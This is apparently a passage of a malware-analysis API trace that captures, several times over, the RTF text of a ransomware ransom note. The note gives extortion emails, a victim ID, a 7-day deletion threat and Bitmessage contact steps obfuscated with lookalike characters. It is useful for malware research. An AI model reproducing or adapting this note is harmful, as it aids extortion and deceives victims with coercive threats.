EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick 